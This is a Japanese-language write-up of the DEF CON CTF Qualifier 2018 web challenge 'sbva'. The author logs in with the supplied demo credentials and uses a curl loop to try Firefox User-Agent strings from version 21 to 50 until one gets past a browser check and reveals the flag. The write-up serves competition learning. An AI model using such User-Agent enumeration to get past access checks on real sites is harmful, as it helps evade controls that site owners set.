DEF CON CTF Qualifier 2018 - sbva
問題文
We offer extensive website protection that stops attackers even when the admin's credentials are leaked! Try our demo page http://0da57cd5.quals2018.oooverflow.io with username:password admin@oooverflow.io:admin to see for yourself.
writeup
ログイン画面でadmin@oooverflow.io:adminを入力してログインすると、
Incompatible browser detected.
の表示。
http://0da57cd5.quals2018.oooverflow.io/wrongbrowser.phpへリダイレクトさせられる。
他に何が起きているか確認するため、curlで見てみる。
ctfuser@kali:sbva$ curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v * Trying 13.56.115.190... * TCP_NODELAY set * Connected to 0da57cd5.quals2018.oooverflow.io (13.56.115.190) port 80 (#0) > POST /login.php HTTP/1.1 > Host: 0da57cd5.quals2018.oooverflow.io > User-Agent: curl/7.57.0 > Accept: */* > Content-Length: 43 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 43 out of 43 bytes < HTTP/1.1 302 Found < Server: nginx/1.10.3 (Ubuntu) < Date: Sat, 12 May 2018 11:11:52 GMT < Content-Type: text/html; charset=UTF-8 < Transfer-Encoding: chunked < Connection: keep-alive < Set-Cookie: PHPSESSID=luj4oovknmmia6boqqbd7bkde3; path=/ < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < Content-Security-Policy: upgrade-insecure-requests < Location: wrongbrowser.php < <html> <style scoped> h1 {color:red;} p {color:blue;} </style> <video id="v" autoplay> </video> <script> if (navigator.battery.charging) { console.log("Device is charging.") } </script> * Connection #0 to host 0da57cd5.quals2018.oooverflow.io left intact </html>
HTTPレスポンスヘッダーのLocationヘッダーにwrongbrowser.phpがセットされているため、
画面表示されずにwrongbrowser.phpへリダイレクトされるのだが、HTTPレスポンスボディにコンテンツがあった。
これは怪しい。また、コンテンツにはあまり目にしないタグとプロパティがあることに気づく。
style scoped
<style>: The Style Information element - HTML | MDN
Chromeは19-35の間だけサポート。
FireFoxは21からサポート。navigator.battery.charging
Navigator.battery - Web APIs | MDN
Chromeは38からサポート。(ただ、自分のChrome66では使用できなかった。)
FireFoxは50でサポート打ち切り([3] Removed in Firefox 50, in favor of navigator.getBattery().)
これらの機能を使用できるブラウザのUserAgentをHTTPリクエストヘッダーにセットすればいいのだろうか。
Gecko ユーザエージェント文字列リファレンス - HTTP | MDN
より、FirefoxのUserAgent仕様を確認する。
UserAgentのバージョン番号を21から50の間で変化させて総当たりする。
ctfuser@kali:sbva$ cat try_FF.sh #!/bin/bash for VER in `seq 21 50` do UA="Mozilla/5.0 (Windows NT 6.1; rv:$VER.0) Gecko/20100101 Firefox/$VER.0" echo $UA curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v -H "User-Agent: $UA" 2>&1 | grep wrongbrowser.php done
ctfuser@kali:sbva$ ./try_FF.sh Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0 Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0 < Location: wrongbrowser.php Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0 < Location: wrongbrowser.php
Firefox/42だけ、Location: wrongbrowser.phpが返ってこない。
curlで単独実行してみると、フラグが返ってきていた。
ctfuser@kali:sbva$ curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v -H "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0" * Trying 13.56.115.190... * TCP_NODELAY set * Connected to 0da57cd5.quals2018.oooverflow.io (13.56.115.190) port 80 (#0) > POST /login.php HTTP/1.1 > Host: 0da57cd5.quals2018.oooverflow.io > Accept: */* > User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0 > Content-Length: 43 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 43 out of 43 bytes < HTTP/1.1 200 OK < Server: nginx/1.10.3 (Ubuntu) < Date: Sun, 13 May 2018 06:12:36 GMT < Content-Type: text/html; charset=UTF-8 < Transfer-Encoding: chunked < Connection: keep-alive < Set-Cookie: PHPSESSID=2kocc3ljm9njjsoediqasm6af6; path=/ < Expires: Thu, 19 Nov 1981 08:52:00 GMT[f:id:graneed:20180513154645p:plain] < Cache-Control: no-store, no-cache, must-revalidate < Pragma: no-cache < Content-Security-Policy: upgrade-insecure-requests < OOO{0ld@dm1nbr0wser1sth30nlyw@y} <html> <style scoped> h1 {color:red;} p {color:blue;} </style> <video id="v" autoplay> </video> <script> if (navigator.battery.charging) { console.log("Device is charging.") } </script> * Connection #0 to host 0da57cd5.quals2018.oooverflow.io left intact </html>